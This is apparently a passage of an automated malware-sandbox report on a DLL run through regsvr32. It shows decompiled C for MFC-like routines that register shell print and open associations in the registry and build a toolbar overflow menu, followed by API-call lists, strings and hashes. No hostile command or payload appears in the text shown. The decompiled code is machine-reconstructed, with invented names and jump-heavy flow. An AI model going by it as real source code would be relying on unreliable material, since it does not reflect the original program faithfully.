                                                                                                                												L1000106E(_t348 - 0x14, "%s\\shell\\printto\\%s",  *((intOrPtr*)(_t348 - 0x10)));
                                                                                                                												_t349 = _t349 + 0x10;
                                                                                                                												_t220 = E10027494( *((intOrPtr*)(_t348 - 0x14)),  *((intOrPtr*)(_t348 - 0x20)), 0);
                                                                                                                												__eflags = _t220;
                                                                                                                												if(_t220 == 0) {
                                                                                                                													goto L42;
                                                                                                                												}
                                                                                                                												goto L34;
                                                                                                                											}
                                                                                                                											L100013E3( *((intOrPtr*)(_t348 - 0x1c)) + 0xfffffff0, _t335);
                                                                                                                											L100013E3( *((intOrPtr*)(_t348 - 0x10)) + 0xfffffff0, _t335);
                                                                                                                											L100013E3( &(( *(_t348 - 0x18))[0xfffffffffffffff0]), _t335);
                                                                                                                											L100013E3(_t344 - 0x10, _t335);
                                                                                                                											L100013E3( *((intOrPtr*)(_t348 - 0x20)) + 0xfffffff0, _t335);
                                                                                                                											_t286 =  *((intOrPtr*)(_t348 - 0x28)) + 0xfffffff0;
                                                                                                                											goto L43;
                                                                                                                										}
                                                                                                                										_push(_t339);
                                                                                                                										L1000106E(_t348 - 0x14, "%s\\shell\\print\\%s",  *((intOrPtr*)(_t348 - 0x10)));
                                                                                                                										_t349 = _t349 + 0x10;
                                                                                                                										_t228 = E10027494( *((intOrPtr*)(_t348 - 0x14)), "[print(\"%1\")]", 0);
                                                                                                                										__eflags = _t228;
                                                                                                                										if(_t228 == 0) {
                                                                                                                											goto L16;
                                                                                                                										}
                                                                                                                										_push(_t339);
                                                                                                                										L1000106E(_t348 - 0x14, "%s\\shell\\printto\\%s",  *((intOrPtr*)(_t348 - 0x10)));
                                                                                                                										_t349 = _t349 + 0x10;
                                                                                                                										_t231 = E10027494( *((intOrPtr*)(_t348 - 0x14)), "[printto(\"%1\",\"%2\",\"%3\",\"%4\")]", 0);
                                                                                                                										__eflags = _t231;
                                                                                                                										if(_t231 == 0) {
                                                                                                                											goto L16;
                                                                                                                										}
                                                                                                                										_t340 = " /dde";
                                                                                                                										E1000B029(_t348 - 0x24, _t340);
                                                                                                                										E1000B029(_t348 - 0x28, _t340);
                                                                                                                										_push(_t340);
                                                                                                                										L21:
                                                                                                                										_t304 = _t348 - 0x20;
                                                                                                                										goto L28;
                                                                                                                									}
                                                                                                                									_t234 =  *((intOrPtr*)(_t348 - 0x14));
                                                                                                                									__eflags =  *((intOrPtr*)(_t234 - 0xc));
                                                                                                                									if( *((intOrPtr*)(_t234 - 0xc)) == 0) {
                                                                                                                										goto L22;
                                                                                                                									}
                                                                                                                									E1000B029(_t348 - 0x24, " \"%1\"");
                                                                                                                									__eflags = _t257;
                                                                                                                									if(_t257 == 0) {
                                                                                                                										goto L29;
                                                                                                                									}
                                                                                                                									E1000B029(_t348 - 0x28, " /p \"%1\"");
                                                                                                                									_push(" /pt \"%1\" \"%2\" \"%3\" \"%4\"");
                                                                                                                									goto L21;
                                                                                                                								}
                                                                                                                								L1000106E(_t348 - 0x14, "%s\\DefaultIcon",  *((intOrPtr*)(_t348 - 0x10)));
                                                                                                                								_t349 = _t349 + 0xc;
                                                                                                                								_t239 = E10027494( *((intOrPtr*)(_t348 - 0x14)), _t344, 0);
                                                                                                                								__eflags = _t239;
                                                                                                                								if(_t239 != 0) {
                                                                                                                									goto L17;
                                                                                                                								}
                                                                                                                								goto L16;
                                                                                                                							} else {
                                                                                                                								L100013E3( *((intOrPtr*)(_t348 - 0x1c)) + 0xfffffff0, _t335);
                                                                                                                								L100013E3( *((intOrPtr*)(_t348 - 0x10)) + 0xfffffff0, _t335);
                                                                                                                								L100013E3( &(( *(_t348 - 0x18))[0xfffffffffffffff0]), _t335);
                                                                                                                								_t298 =  *((intOrPtr*)(_t348 - 0x38)) + 0xfffffff0;
                                                                                                                								L13:
                                                                                                                								L100013E3(_t298, _t335);
                                                                                                                								L100013E3( *((intOrPtr*)(_t348 - 0x20)) + 0xfffffff0, _t335);
                                                                                                                								L100013E3( *((intOrPtr*)(_t348 - 0x28)) + 0xfffffff0, _t335);
                                                                                                                								_t287 =  *((intOrPtr*)(_t348 - 0x24)) + 0xfffffff0;
                                                                                                                								goto L44;
                                                                                                                							}
                                                                                                                						}
                                                                                                                						L44:
                                                                                                                						 *(_t348 - 4) = 1;
                                                                                                                						L100013E3(_t287, _t335);
                                                                                                                						 *(_t348 - 0x30) =  *(_t348 - 0x30) + 1;
                                                                                                                					} while ( *((intOrPtr*)(_t348 - 0x3c)) != 0);
                                                                                                                					goto L45;
                                                                                                                				}
                                                                                                                			}





































                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x100285bb
                                                                                                                0x100285cc
                                                                                                                0x100285d1
                                                                                                                0x100285dc
                                                                                                                0x100285e1
                                                                                                                0x100285e3
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x100285e3
                                                                                                                0x1002854f
                                                                                                                0x1002855a
                                                                                                                0x10028565
                                                                                                                0x1002856d
                                                                                                                0x10028578
                                                                                                                0x10028580
                                                                                                                0x00000000
                                                                                                                0x10028580
                                                                                                                0x1002849c
                                                                                                                0x100284a9
                                                                                                                0x100284ae
                                                                                                                0x100284bb
                                                                                                                0x100284c0
                                                                                                                0x100284c2
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x100284c8
                                                                                                                0x100284d5
                                                                                                                0x100284da
                                                                                                                0x100284e7
                                                                                                                0x100284ec
                                                                                                                0x100284ee
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x100284f4
                                                                                                                0x100284fd
                                                                                                                0x10028506
                                                                                                                0x1002850b
                                                                                                                0x1002845f
                                                                                                                0x1002845f
                                                                                                                0x00000000
                                                                                                                0x1002845f
                                                                                                                0x1002842f
                                                                                                                0x10028432
                                                                                                                0x10028436
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10028440
                                                                                                                0x10028445
                                                                                                                0x10028447
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10028455
                                                                                                                0x1002845a
                                                                                                                0x00000000
                                                                                                                0x1002845a
                                                                                                                0x100283e1
                                                                                                                0x100283e6
                                                                                                                0x100283ef
                                                                                                                0x100283f4
                                                                                                                0x100283f6
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10028384
                                                                                                                0x1002838a
                                                                                                                0x10028395
                                                                                                                0x100283a0
                                                                                                                0x100283a8
                                                                                                                0x100283ab
                                                                                                                0x100283ab
                                                                                                                0x100283b6
                                                                                                                0x100283c1
                                                                                                                0x100283c9
                                                                                                                0x00000000
                                                                                                                0x100283c9
                                                                                                                0x10028382
                                                                                                                0x100286d7
                                                                                                                0x100286d7
                                                                                                                0x100286db
                                                                                                                0x100286e0
                                                                                                                0x100286e3
                                                                                                                0x00000000
                                                                                                                0x1002822d

                                                                                                                APIs
                                                                                                                • __EH_prolog3.LIBCMT ref: 100281D5
                                                                                                                  • Part of subcall function 10029AB3: GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 10029ADC
                                                                                                                  • Part of subcall function 10029AB3: GetShortPathNameA.KERNEL32 ref: 10029AF3
                                                                                                                • ExtractIconA.SHELL32(?,?,00000001), ref: 100282A7
                                                                                                                • DestroyIcon.USER32(00000000), ref: 100282C8
                                                                                                                  • Part of subcall function 10027494: lstrlenA.KERNEL32(?), ref: 100274A0
                                                                                                                  • Part of subcall function 10027494: RegSetValueA.ADVAPI32(80000000,?,00000001,?,00000000), ref: 100274B4
                                                                                                                • RegQueryValueA.ADVAPI32(80000000,?,00000000,?), ref: 10028622
                                                                                                                  • Part of subcall function 10027494: RegCreateKeyA.ADVAPI32(80000000,?,?), ref: 100274CE
                                                                                                                  • Part of subcall function 10027494: lstrlenA.KERNEL32(?), ref: 100274DB
                                                                                                                  • Part of subcall function 10027494: RegSetValueExA.ADVAPI32(?,00000000,00000000,00000001,?,00000001), ref: 100274F0
                                                                                                                  • Part of subcall function 10027494: RegCloseKey.ADVAPI32(?), ref: 100274FB
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Value$IconNamelstrlen$CloseCreateDestroyExtractFileH_prolog3ModulePathQueryShort
                                                                                                                • String ID: "%1"$ /dde$ /p "%1"$ /pt "%1" "%2" "%3" "%4"$%s\DefaultIcon$%s\ShellNew$%s\shell\open\%s$%s\shell\print\%s$%s\shell\printto\%s$,%d$NullFile$[open("%1")]$[print("%1")]$[printto("%1","%2","%3","%4")]$command$ddeexec
                                                                                                                • API String ID: 4251081318-4043335175
                                                                                                                • Opcode ID: 4c32ff4bc902e0c98f2780655bd273f9fef7291b1b55e839649e5e4854e4e306
                                                                                                                • Instruction ID: cc2a2a3f3ee0db5eddfe98f37bb65f156932ebb08ca72f69f933ffad2634399a
                                                                                                                • Opcode Fuzzy Hash: 4c32ff4bc902e0c98f2780655bd273f9fef7291b1b55e839649e5e4854e4e306
                                                                                                                • Instruction Fuzzy Hash: 44F15839D0020AABEB04EBE4CC96BEEB7B4EF04354F500118F625772D6DB70AA45CB65
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 98%
                                                                                                                			E10037781(void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                				void* __ebp;
                                                                                                                				CHAR* _t151;
                                                                                                                				void* _t159;
                                                                                                                				signed int _t195;
                                                                                                                				signed int _t232;
                                                                                                                				signed int _t246;
                                                                                                                				signed int _t247;
                                                                                                                				signed int _t256;
                                                                                                                				signed int _t257;
                                                                                                                				int _t267;
                                                                                                                				signed int _t269;
                                                                                                                				signed int _t318;
                                                                                                                				void* _t336;
                                                                                                                				int _t341;
                                                                                                                				signed int _t342;
                                                                                                                				int _t346;
                                                                                                                				struct HWND__** _t347;
                                                                                                                				signed int _t348;
                                                                                                                				RECT* _t350;
                                                                                                                				int _t351;
                                                                                                                				struct tagMENUITEMINFOA _t352;
                                                                                                                				int _t353;
                                                                                                                				intOrPtr _t354;
                                                                                                                				void* _t358;
                                                                                                                				void* _t364;
                                                                                                                
                                                                                                                				_t364 = __eflags;
                                                                                                                				_t336 = __edx;
                                                                                                                				_push(0xf4);
                                                                                                                				E1004764D(0x10090c41, __ebx, __edi, __esi);
                                                                                                                				 *((intOrPtr*)(_t358 + 0x60)) = __ecx;
                                                                                                                				L1000140B(_t358 + 0x64, E100184C0());
                                                                                                                				_t338 = lstrlenA;
                                                                                                                				 *(_t358 - 4) =  *(_t358 - 4) & 0x00000000;
                                                                                                                				_t265 = "ReBarWindow32";
                                                                                                                				_t346 = lstrlenA("ReBarWindow32") + 1;
                                                                                                                				_t151 = L100011F4(_t358 + 0x64, _t346);
                                                                                                                				_t347 =  *(_t358 + 0x74);
                                                                                                                				GetClassNameA( *_t347, _t151, _t346);
                                                                                                                				E1000FED3(_t358 + 0x64, 0xffffffff);
                                                                                                                				 *(_t358 + 0x74) = E10014011(_t358 + 0x64, lstrlenA, _t347, _t364,  *_t347);
                                                                                                                				if(E1001BBE2("ReBarWindow32", _t358 + 0x64, _t336, lstrlenA, _t347, _t358, _t265) != 0) {
                                                                                                                					L33:
                                                                                                                					_t348 = 0;
                                                                                                                					L6:
                                                                                                                					L100013E3( *((intOrPtr*)(_t358 + 0x64)) + 0xfffffff0, _t336);
                                                                                                                					 *[fs:0x0] =  *((intOrPtr*)(_t358 - 0xc));
                                                                                                                					return _t348;
                                                                                                                				}
                                                                                                                				_t267 =  *(_t358 + 0x74);
                                                                                                                				if(_t267 == 0 || E100203AA(_t267, 0x1009f7c8) == 0) {
                                                                                                                					goto L33;
                                                                                                                				} else {
                                                                                                                					_t159 = E10014B68(_t267);
                                                                                                                					if(_t159 == 0) {
                                                                                                                						L7:
                                                                                                                						E1001E619(_t267, _t358, _t338, _t347, __eflags);
                                                                                                                						 *(_t358 - 4) = 1;
                                                                                                                						L1000140B(_t358 + 0x70, E100184C0());
                                                                                                                						 *(_t358 - 4) = 2;
                                                                                                                						L1000140B(_t358 + 0x5c, E100184C0());
                                                                                                                						 *(_t358 - 4) = 3;
                                                                                                                						E1000C4AC(_t358 + 0x28);
                                                                                                                						_push( *((intOrPtr*)(_t358 + 0x60)));
                                                                                                                						 *(_t358 - 4) = 4;
                                                                                                                						L1000CD6F(_t267, _t358 - 0x30, _t338, _t347, __eflags);
                                                                                                                						_t268 = SendMessageA;
                                                                                                                						 *(_t358 - 4) = 5;
                                                                                                                						 *(_t358 - 0x100) = 0x50;
                                                                                                                						 *((intOrPtr*)(_t358 - 0xfc)) = 0x10;
                                                                                                                						SendMessageA( *(_t267 + 0x20), 0x41d, _t347[3], _t358 - 0x100);
                                                                                                                						_t34 =  *(_t358 + 0x74) + 0x20; // 0x100ad5f0
                                                                                                                						SendMessageA( *_t34, 0x409, _t347[3], _t358 - 0x1c);
                                                                                                                						_t341 = lstrlenA("ToolbarWindow32") + 1;
                                                                                                                						GetClassNameA( *(_t358 - 0xe0), L100011F4(_t358 + 0x64, _t341), _t341);
                                                                                                                						E1000FED3(_t358 + 0x64, 0xffffffff);
                                                                                                                						_t342 = E10014011(_t358 + 0x64, _t341, _t347, __eflags,  *(_t358 - 0xe0));
                                                                                                                						 *(_t358 + 0x20) = _t342;
                                                                                                                						__eflags = E1001BBE2(SendMessageA, _t358 + 0x64, _t336, _t342, _t347, _t358, "ToolbarWindow32");
                                                                                                                						if(__eflags != 0) {
                                                                                                                							L32:
                                                                                                                							 *(_t358 - 4) = 4;
                                                                                                                							L1000CDC3(_t268, _t358 - 0x30, _t342, _t347, __eflags);
                                                                                                                							 *(_t358 - 4) = 3;
                                                                                                                							L1000CD56(_t358 + 0x28);
                                                                                                                							L100013E3( *((intOrPtr*)(_t358 + 0x5c)) + 0xfffffff0, _t336);
                                                                                                                							__eflags =  *((intOrPtr*)(_t358 + 0x70)) + 0xfffffff0;
                                                                                                                							L100013E3( *((intOrPtr*)(_t358 + 0x70)) + 0xfffffff0, _t336);
                                                                                                                							 *(_t358 - 4) = 0;
                                                                                                                							E1001E680(_t268, _t358, _t342, _t347, __eflags);
                                                                                                                							goto L33;
                                                                                                                						}
                                                                                                                						__eflags = _t342;
                                                                                                                						if(__eflags == 0) {
                                                                                                                							goto L32;
                                                                                                                						}
                                                                                                                						__eflags = E100203AA(_t342, 0x1009f474);
                                                                                                                						if(__eflags == 0) {
                                                                                                                							goto L32;
                                                                                                                						}
                                                                                                                						_t350 =  &(_t347[6]);
                                                                                                                						__eflags = _t350;
                                                                                                                						 *(_t358 - 0x14) = _t350->left;
                                                                                                                						 *(_t358 + 0x24) = _t350;
                                                                                                                						E1000C931( *(_t358 + 0x74), _t358 - 0x1c);
                                                                                                                						E1000C8F5(_t342, _t358 - 0x1c);
                                                                                                                						_t351 = E100353F2(_t342);
                                                                                                                						 *(_t358 + 0x58) = _t351;
                                                                                                                						while(1) {
                                                                                                                							_t351 = _t351 - 1;
                                                                                                                							 *(_t358 + 0x74) = _t351;
                                                                                                                							SendMessageA( *(_t342 + 0x20), 0x41d, _t351, _t358 - 0x80);
                                                                                                                							_t195 = IntersectRect(_t358 - 0x90, _t358 - 0x1c, _t358 - 0x80);
                                                                                                                							__eflags = _t195;
                                                                                                                							if(_t195 != 0) {
                                                                                                                								break;
                                                                                                                							}
                                                                                                                							__eflags = _t351;
                                                                                                                							if(_t351 > 0) {
                                                                                                                								continue;
                                                                                                                							}
                                                                                                                							break;
                                                                                                                						}
                                                                                                                						_t352 = 0x30;
                                                                                                                						E10049170(_t342, _t358 - 0x70, 0, _t352);
                                                                                                                						 *(_t358 - 0x70) = _t352;
                                                                                                                						_t343 = E1003541E(_t342);
                                                                                                                						E1003C2E3(_t358 + 0x3c);
                                                                                                                						 *((intOrPtr*)(_t358 + 0x3c)) = 0x1009e49c;
                                                                                                                						_t353 =  *(_t358 + 0x74);
                                                                                                                						 *(_t358 - 4) = 6;
                                                                                                                						E1003C30A(_t358 + 0x3c,  *(_t358 + 0x58) - _t353, 0xffffffff);
                                                                                                                						E1001E54F(_t358, _t198, _t358, CreatePopupMenu());
                                                                                                                						E1000D064(_t358 + 0x28, _t358 - 0x30);
                                                                                                                						_t269 = 0;
                                                                                                                						__eflags = _t353 -  *(_t358 + 0x58);
                                                                                                                						if(__eflags >= 0) {
                                                                                                                							L27:
                                                                                                                							CopyRect(_t358 - 0x40,  *(_t358 + 0x24));
                                                                                                                							E1000C931( *((intOrPtr*)(_t358 + 0x60)), _t358 - 0x40);
                                                                                                                							_t354 = 0;
                                                                                                                							E10012A40(_t358, __eflags, 0,  *(_t358 - 0x40),  *((intOrPtr*)(_t358 - 0x34)),  *((intOrPtr*)(_t358 + 0x60)), 0);
                                                                                                                							__eflags = _t269;
                                                                                                                							 *((intOrPtr*)( *((intOrPtr*)(_t358 + 0x78)))) = 0;
                                                                                                                							if(__eflags <= 0) {
                                                                                                                								L31:
                                                                                                                								 *(_t358 - 4) = 5;
                                                                                                                								E1003C2FA(_t358 + 0x3c);
                                                                                                                								 *(_t358 - 4) = 4;
                                                                                                                								L1000CDC3(_t269, _t358 - 0x30, _t343, _t354, __eflags);
                                                                                                                								 *(_t358 - 4) = 3;
                                                                                                                								L1000CD56(_t358 + 0x28);
                                                                                                                								L100013E3( *((intOrPtr*)(_t358 + 0x5c)) + 0xfffffff0, _t336);
                                                                                                                								L100013E3( *((intOrPtr*)(_t358 + 0x70)) + 0xfffffff0, _t336);
                                                                                                                								 *(_t358 - 4) = 0;
                                                                                                                								E1001E680(_t269, _t358, _t343, _t354, __eflags);
                                                                                                                								_t348 = 1;
                                                                                                                								goto L6;
                                                                                                                							} else {
                                                                                                                								goto L28;
                                                                                                                							}
                                                                                                                							do {
                                                                                                                								L28:
                                                                                                                								_t318 =  *(E1003524D(_t358 + 0x3c, _t354));
                                                                                                                								__eflags = _t318;
                                                                                                                								if(_t318 != 0) {
                                                                                                                									 *((intOrPtr*)( *_t318 + 4))(1);
                                                                                                                								}
                                                                                                                								_t354 = _t354 + 1;
                                                                                                                								__eflags = _t354 - _t269;
                                                                                                                							} while (__eflags < 0);
                                                                                                                							goto L31;
                                                                                                                						} else {
                                                                                                                							goto L14;
                                                                                                                						}
                                                                                                                						do {
                                                                                                                							L14:
                                                                                                                							E1003E06B( *(_t358 + 0x20), _t336, __eflags,  *(_t358 + 0x74), _t358 + 0x54, _t358 + 0x38, _t358 + 0x50);
                                                                                                                							__eflags =  *(_t358 + 0x38) & 0x00000001;
                                                                                                                							if(( *(_t358 + 0x38) & 0x00000001) != 0) {
                                                                                                                								__eflags = _t269;
                                                                                                                								if(_t269 == 0) {
                                                                                                                									goto L26;
                                                                                                                								}
                                                                                                                								 *((intOrPtr*)(_t358 - 0x6c)) = 0x100;
                                                                                                                								 *((intOrPtr*)(_t358 - 0x68)) = 0x800;
                                                                                                                								L25:
                                                                                                                								InsertMenuItemA( *(_t358 + 4),  *(_t358 + 0x74), 1, _t358 - 0x70);
                                                                                                                								goto L26;
                                                                                                                							}
                                                                                                                							 *((intOrPtr*)(_t358 - 0x6c)) = 0x162;
                                                                                                                							L10001276(_t358 + 0x70,  *((intOrPtr*)(_t358 + 0x54)));
                                                                                                                							E1001FB1B(_t358 + 0x5c,  *((intOrPtr*)(_t358 + 0x70)), 1, 0xa);
                                                                                                                							_t232 = E10009F14(__eflags, 8);
                                                                                                                							__eflags = _t232;
                                                                                                                							if(_t232 == 0) {
                                                                                                                								_t232 = 0;
                                                                                                                								__eflags = 0;
                                                                                                                							} else {
                                                                                                                								 *(_t232 + 4) =  *(_t232 + 4) & 0x00000000;
                                                                                                                								 *_t232 = 0x10098d24;
                                                                                                                							}
                                                                                                                							E1003C4E9(_t269, _t358 + 0x3c, _t358, _t269, _t232);
                                                                                                                							L10036D80(_t358 + 0x3c,  *((intOrPtr*)(_t343 + 4)),  *((intOrPtr*)(_t358 + 0x50)), _t358 - 0xb0);
                                                                                                                							CopyRect(_t358 + 0x10, _t358 - 0xa0);
                                                                                                                							OffsetRect(_t358 + 0x10,  ~( *(_t358 + 0x10)),  ~( *(_t358 + 0x14)));
                                                                                                                							E10035296( *(E1003524D(_t358 + 0x3c, _t269)), _t358 - 0x30,  *((intOrPtr*)(_t358 + 0x18)),  *((intOrPtr*)(_t358 + 0x1c)));
                                                                                                                							_t246 =  *(E1003524D(_t358 + 0x3c, _t269));
                                                                                                                							__eflags = _t246;
                                                                                                                							if(_t246 != 0) {
                                                                                                                								_t246 =  *(_t246 + 4);
                                                                                                                							}
                                                                                                                							_t247 = E1000D0A1( *((intOrPtr*)(_t358 + 0x2c)), _t246);
                                                                                                                							 *(E1003524D(_t358 + 0x3c, _t269)) = _t247;
                                                                                                                							E1001FBA9(_t358 + 0x28, _t358 + 0x10, GetSysColor(4));
                                                                                                                							L10036D9E(_t343, _t358 + 0x28,  *((intOrPtr*)(_t358 + 0x50)), 0, 0, 1);
                                                                                                                							_t256 =  *(E1003524D(_t358 + 0x3c, _t269));
                                                                                                                							__eflags = _t256;
                                                                                                                							if(_t256 != 0) {
                                                                                                                								_t256 =  *(_t256 + 4);
                                                                                                                							}
                                                                                                                							_t257 = E1000D0A1( *((intOrPtr*)(_t358 + 0x2c)), _t256);
                                                                                                                							 *(E1003524D(_t358 + 0x3c, _t269)) = _t257;
                                                                                                                							 *((intOrPtr*)(_t358 - 0x4c)) =  *((intOrPtr*)(_t358 + 0x5c));
                                                                                                                							 *((intOrPtr*)(_t358 - 0x60)) =  *((intOrPtr*)(_t358 + 0x54));
                                                                                                                							 *((intOrPtr*)(_t358 - 0x68)) = 0x100;
                                                                                                                							 *(_t358 - 0x50) =  *(E1003524D(_t358 + 0x3c, _t269));
                                                                                                                							_t269 = _t269 + 1;
                                                                                                                							goto L25;
                                                                                                                							L26:
                                                                                                                							 *(_t358 + 0x74) =  *(_t358 + 0x74) + 1;
                                                                                                                							__eflags =  *(_t358 + 0x74) -  *(_t358 + 0x58);
                                                                                                                						} while (__eflags < 0);
                                                                                                                						goto L27;
                                                                                                                					}
                                                                                                                					_t369 =  *((intOrPtr*)(_t358 + 0x60)) - _t159;
                                                                                                                					if( *((intOrPtr*)(_t358 + 0x60)) == _t159) {
                                                                                                                						goto L7;
                                                                                                                					}
                                                                                                                					_t348 = E10037781(_t267, _t159, _t336, lstrlenA, _t347, _t369,  *((intOrPtr*)(_t358 + 0x70)), _t347,  *((intOrPtr*)(_t358 + 0x78)));
                                                                                                                					goto L6;
                                                                                                                				}
                                                                                                                			}




























                                                                                                                0x1003797f
                                                                                                                0x10037983
                                                                                                                0x1003798d
                                                                                                                0x10037990
                                                                                                                0x100379a1
                                                                                                                0x100379a7
                                                                                                                0x100379a9
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x100379ab
                                                                                                                0x100379ad
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x100379ad
                                                                                                                0x100379b1
                                                                                                                0x100379b9
                                                                                                                0x100379c3
                                                                                                                0x100379ce
                                                                                                                0x100379d0
                                                                                                                0x100379d5
                                                                                                                0x100379df
                                                                                                                0x100379ea
                                                                                                                0x100379ee
                                                                                                                0x100379fd
                                                                                                                0x10037a09
                                                                                                                0x10037a0e
                                                                                                                0x10037a10
                                                                                                                0x10037a13
                                                                                                                0x10037ba3
                                                                                                                0x10037baa
                                                                                                                0x10037bb7
                                                                                                                0x10037bbc
                                                                                                                0x10037bcc
                                                                                                                0x10037bd1
                                                                                                                0x10037bd6
                                                                                                                0x10037bd8
                                                                                                                0x10037bf5
                                                                                                                0x10037bf8
                                                                                                                0x10037bfc
                                                                                                                0x10037c04
                                                                                                                0x10037c08
                                                                                                                0x10037c10
                                                                                                                0x10037c14
                                                                                                                0x10037c1f
                                                                                                                0x10037c2a
                                                                                                                0x10037c32
                                                                                                                0x10037c36
                                                                                                                0x10037c3d
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10037bda
                                                                                                                0x10037bda
                                                                                                                0x10037be3
                                                                                                                0x10037be5
                                                                                                                0x10037be7
                                                                                                                0x10037bed
                                                                                                                0x10037bed
                                                                                                                0x10037bf0
                                                                                                                0x10037bf1
                                                                                                                0x10037bf1
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10037a19
                                                                                                                0x10037a19
                                                                                                                0x10037a2b
                                                                                                                0x10037a30
                                                                                                                0x10037a34
                                                                                                                0x10037b70
                                                                                                                0x10037b72
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10037b74
                                                                                                                0x10037b7b
                                                                                                                0x10037b82
                                                                                                                0x10037b8e
                                                                                                                0x00000000
                                                                                                                0x10037b8e
                                                                                                                0x10037a40
                                                                                                                0x10037a47
                                                                                                                0x10037a57
                                                                                                                0x10037a5e
                                                                                                                0x10037a63
                                                                                                                0x10037a66
                                                                                                                0x10037a74
                                                                                                                0x10037a74
                                                                                                                0x10037a68
                                                                                                                0x10037a68
                                                                                                                0x10037a6c
                                                                                                                0x10037a6c
                                                                                                                0x10037a7b
                                                                                                                0x10037a8d
                                                                                                                0x10037a9d
                                                                                                                0x10037ab3
                                                                                                                0x10037ace
                                                                                                                0x10037adc
                                                                                                                0x10037ade
                                                                                                                0x10037ae0
                                                                                                                0x10037ae2
                                                                                                                0x10037ae2
                                                                                                                0x10037ae9
                                                                                                                0x10037afb
                                                                                                                0x10037b0b
                                                                                                                0x10037b1f
                                                                                                                0x10037b2d
                                                                                                                0x10037b2f
                                                                                                                0x10037b31
                                                                                                                0x10037b33
                                                                                                                0x10037b33
                                                                                                                0x10037b3a
                                                                                                                0x10037b4a
                                                                                                                0x10037b4f
                                                                                                                0x10037b59
                                                                                                                0x10037b5c
                                                                                                                0x10037b6a
                                                                                                                0x10037b6d
                                                                                                                0x00000000
                                                                                                                0x10037b94
                                                                                                                0x10037b94
                                                                                                                0x10037b9a
                                                                                                                0x10037b9a
                                                                                                                0x00000000
                                                                                                                0x10037a19
                                                                                                                0x1003781f
                                                                                                                0x10037822
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10037832
                                                                                                                0x00000000
                                                                                                                0x10037832

                                                                                                                APIs
                                                                                                                • __EH_prolog3.LIBCMT ref: 1003778F
                                                                                                                • lstrlenA.KERNEL32(ReBarWindow32,00000000,000000F4), ref: 100377B5
                                                                                                                • GetClassNameA.USER32(?,00000000,00000001), ref: 100377CA
                                                                                                                  • Part of subcall function 1000FED3: _strlen.LIBCMT ref: 1000FEE6
                                                                                                                • SendMessageA.USER32 ref: 100378CE
                                                                                                                • SendMessageA.USER32 ref: 100378E3
                                                                                                                • lstrlenA.KERNEL32(ToolbarWindow32), ref: 100378EA
                                                                                                                • GetClassNameA.USER32(?,00000000,00000001), ref: 10037900
                                                                                                                • SendMessageA.USER32 ref: 10037990
                                                                                                                • IntersectRect.USER32(?,?,?), ref: 100379A1
                                                                                                                • _memset.LIBCMT ref: 100379B9
                                                                                                                • CreatePopupMenu.USER32 ref: 100379F3
                                                                                                                • CopyRect.USER32(?,?), ref: 10037A9D
                                                                                                                • OffsetRect.USER32 ref: 10037AB3
                                                                                                                • GetSysColor.USER32 ref: 10037AFD
                                                                                                                • InsertMenuItemA.USER32 ref: 10037B8E
                                                                                                                • CopyRect.USER32(?,?), ref: 10037BAA
                                                                                                                  • Part of subcall function 1000CDC3: __EH_prolog3.LIBCMT ref: 1000CDCA
                                                                                                                  • Part of subcall function 1000CDC3: ReleaseDC.USER32(?,00000000), ref: 1000CDE7
                                                                                                                  • Part of subcall function 1000CD56: DeleteDC.GDI32(00000000), ref: 1000CD68
                                                                                                                  • Part of subcall function 1001E680: __EH_prolog3.LIBCMT ref: 1001E687
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmp
